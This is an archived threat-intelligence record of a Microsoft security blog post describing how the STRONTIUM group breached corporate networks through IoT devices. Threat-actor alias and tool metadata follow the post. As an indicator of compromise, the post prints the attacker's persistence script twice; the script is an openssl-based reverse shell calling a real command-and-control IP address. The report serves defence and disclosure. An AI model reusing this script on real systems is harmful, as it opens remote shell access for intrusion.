{
	"id": "a678a963-60d0-4dd0-b62e-963aa895b114",
	"created_at": "2026-04-06T00:13:04.722944Z",
	"updated_at": "2026-04-10T03:37:50.496065Z",
	"deleted_at": null,
	"sha1_hash": "b7f0b0cbc98661043021b763e1226d9db89845b8",
	"title": "Corporate IoT - a path to intrusion",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 71186,
	"plain_text": "Corporate IoT - a path to intrusion\r\nBy MSRC Team\r\nPublished: 2019-08-05 · Archived: 2026-04-05 13:17:44 UTC\r\nSeveral sources estimate that by the year 2020 some 50 billion IoT devices will be deployed worldwide. IoT devices are purposefully designed to connect to a network, and many are simply connected to the internet with little management or oversight. Such devices still must be identifiable, maintained, and monitored by security teams, especially in large, complex enterprises. Some IoT devices may even communicate basic telemetry back to the device manufacturer or have means to receive software updates. In most cases, however, the customers’ IT operations centers don’t know they exist on the network.\r\nIn 2016, the Mirai botnet was discovered by the malware research group MalwareMustDie. The botnet initially consisted of IP cameras and basic home routers, two types of IoT devices commonly found in the household. As more variants of Mirai emerged, so did the list of IoT devices it was targeting. The source code for the malware powering this botnet was eventually leaked online.\r\nIn 2018, hundreds of thousands of home and small business networking and storage devices were compromised and loaded with the so-called “VPN Filter” malware. The FBI has publicly attributed this activity to a nation-state actor and took subsequent actions to disrupt this botnet, although the devices would remain vulnerable to re-infection unless proper firmware or security controls were put in place by the user.\r\nThere were also multiple press reports of cyber-attacks on several devices during the opening ceremonies for the 2018 Olympic Games in PyeongChang. Officials did confirm a few days later that they were a victim of malicious cyber-attacks that prevented attendees from printing their tickets to the Games, and televisions and internet access in the main press center simply stopped working.\r\nThree IoT devices\r\nIn April, security researchers in the Microsoft Threat Intelligence Center discovered infrastructure of a known adversary communicating to several external devices. Further research uncovered attempts by the actor to compromise popular IoT devices (a VOIP phone, an office printer, and a video decoder) across multiple customer locations. The investigation uncovered that an actor had used these devices to gain initial access to corporate networks. In two of the cases, the devices were deployed without changing the default manufacturer’s passwords, and in the third instance the latest security update had not been applied to the device. These devices became points of ingress from which the actor established a presence on the network and continued looking for further access. Once the actor had successfully established access to the network, a simple network scan to look for other insecure devices allowed them to discover and move across the network in search of higher-privileged accounts that would grant access to higher-value data. After gaining access to each of the IoT devices, the actor ran tcpdump to sniff network traffic on local subnets. They were also seen enumerating administrative groups to attempt further exploitation. As the actor moved from one device to another, they would drop a simple shell script to establish persistence on the network which allowed extended access to continue hunting. Analysis of network traffic showed the devices were also communicating with an external command and control (C2) server.\r\nhttps://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/\r\nPage 1 of 4\r\n-- contents of [IOT Device] ` file–\r\n!/bin/sh\r\nexport _ [IOT Device] _`` =\"-qws -display :1 -nomouse\" echo 1|tee /tmp/.c;sh -c '(until (sh -c\r\n\"openssl s_client -quiet -host 167.114.153.55 -port 443 |while : ; do sh \u0026\u0026 break; done| openssl\r\ns_client -quiet -host 167.114.153.55 -port 443\"); do (sleep 10 \u0026\u0026 cn=$(( cat /tmp/.c`+1)) \u0026\u0026 echo\r\n$cn|tee /tmp.c \u0026\u0026 if [ $cn -ge 30 ]; then (rm /tmp/.c;pkill -f ‘openssl’); fi);done)\u0026’ \u0026\r\nFigure 1: script used to maintain network persistence\r\nThe following IP addresses are believed to have been used by the actor for command and control (C2) during these intrusions:\r\nAttribution\r\nWe attribute the attacks on these customers using three popular IoT devices to an activity group that Microsoft refers to as STRONTIUM. Since we identified these attacks in the early stages, we have not been able to conclusively determine what STRONTIUM’s ultimate objectives were in these intrusions.\r\nOver the last twelve months, Microsoft has delivered nearly 1400 nation-state notifications to those who have been targeted or compromised by STRONTIUM. One in five notifications of STRONTIUM activity were tied to attacks against non-governmental organizations, think tanks, or politically affiliated organizations around the world. The remaining 80% of STRONTIUM attacks have largely targeted organizations in the following sectors: government, IT, military, defense, medicine, education, and engineering. We have also observed and notified STRONTIUM attacks against Olympic organizing committees, anti-doping agencies, and the hospitality industry. The “VPN Filter” malware has also been attributed to STRONTIUM by the FBI.\r\nCall to action\r\nToday we are sharing this information to raise awareness of these risks across the industry and calling for better enterprise integration of IoT devices, particularly the ability to monitor IoT device telemetry within enterprise networks. Today, the number of deployed IoT devices outnumbers the population of personal computers and mobile phones combined. With each networked IoT device having its own separate network stack, it’s quite easy to see the need for better enterprise management, especially in today’s “bring your own device” world.\r\nWhile much of the industry focuses on the threats of hardware implants, we can see in this example that adversaries are happy to exploit simpler configuration and security issues to achieve their objectives. These simple attacks taking advantage of weak device management are likely to expand as more IoT devices are deployed in corporate environments. Upon conclusion of our investigation, we shared this information with the manufacturers of the specific devices involved, and they have used this event to explore new protections in their products. However, there is a need for broader focus across IoT in general, both from security teams at organizations that need to be more aware of these types of threats, as well as from IoT device makers who need to provide better enterprise support and monitoring capabilities to make it easier for security teams to defend their networks.\r\nIndicators of Compromise\r\nBelow are a series of indicators Microsoft has observed as active during the STRONTIUM activity discussed in this article.\r\nCommand-and-Control (C2) IP addresses\r\nScript for maintaining persistence on network connected device\r\n--contents of [IOT Device] ` file–\r\n!/bin/sh\r\nexport _ [IOT Device] _`` =\"-qws -display :1 -nomouse\" echo 1|tee /tmp/.c;sh -c '(until (sh -c\r\n\"openssl s_client -quiet -host 167.114.153.55 -port 443 |while : ; do sh \u0026\u0026 break; done| openssl\r\ns_client -quiet -host 167.114.153.55 -port 443\"); do (sleep 10 \u0026\u0026 cn=$(( cat /tmp/.c`+1)) \u0026\u0026 echo\r\n$cn|tee /tmp.c \u0026\u0026 if [ $cn -ge 30 ]; then (rm /tmp/.c;pkill -f ‘openssl’); fi);done)\u0026’ \u0026\r\nRecommendations for Securing Enterprise IoT\r\nThere are additional steps an organization can take to protect their infrastructure and network from similar activity. Microsoft recommends the following actions to better secure and manage risk associated with IoT devices:\r\n1. Require approval and cataloging of any IoT devices running in your corporate environment.\r\n2. Develop a custom security policy for each IoT device.\r\n3. Avoid exposing IoT devices directly to the internet or create custom access controls to limit exposure.\r\n4. Use a separate network for IoT devices if feasible.\r\n5. Conduct routine configuration/patch audits against deployed IoT devices.\r\n6. Define policies for isolation of IoT devices, preservation of device data, ability to maintain logs of device traffic, and capture of device images for forensic investigation.\r\n7. Include IoT device configuration weaknesses or IoT-based intrusion scenarios as part of Red Team testing.\r\n8. Monitor IoT device activity for abnormal behavior (e.g. a printer browsing SharePoint sites…).\r\n9. Audit any identities and credentials that have authorized access to IoT devices, users and processes.\r\n10. Centralize asset/configuration/patch management if feasible.\r\n11. If your devices are deployed/managed by a 3rd party, include explicit Terms in your contracts detailing security practices to be followed and Audits that report security status and health of all managed devices.\r\n12. Where possible, define SLA Terms in IoT device vendor contracts that set a mutually acceptable window for investigative response and forensic analysis to any compromise involving their product.\r\nThis case is one of several examples that Eric Doerr will present at Black Hat, on August 8, 2019, where Microsoft is calling for greater industry transparency to ensure that defenders are best equipped to respond to threats from well-resourced adversaries.\r\nSource: https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/"
	],
	"report_names": [
		"corporate-iot-a-path-to-intrusion"
	],
	"threat_actors": [
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434384,
	"ts_updated_at": 1775792270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b7f0b0cbc98661043021b763e1226d9db89845b8.pdf",
		"text": "https://archive.orkl.eu/b7f0b0cbc98661043021b763e1226d9db89845b8.txt",
		"img": "https://archive.orkl.eu/b7f0b0cbc98661043021b763e1226d9db89845b8.jpg"
	}
}